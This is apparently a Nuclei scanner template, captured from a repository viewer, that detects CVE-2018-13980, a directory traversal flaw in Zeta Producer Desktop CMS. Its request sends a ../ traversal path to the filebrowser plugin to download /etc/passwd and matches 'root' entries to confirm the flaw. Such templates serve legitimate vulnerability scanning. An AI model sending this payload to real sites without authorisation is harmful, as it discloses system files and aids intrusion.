28 lines
858 B
YAML
28 lines
858 B
YAML
|
id: CVE-2018-13980
|
||
|
|
||
|
info:
|
||
|
name: Zeta Producer Desktop CMS 14.2.0 - Local File Disclosure
|
||
|
author: wisnupramoedya
|
||
|
severity: high
|
||
|
description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal.
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/45016
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-13980
|
||
|
tags: cve,cve2018,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|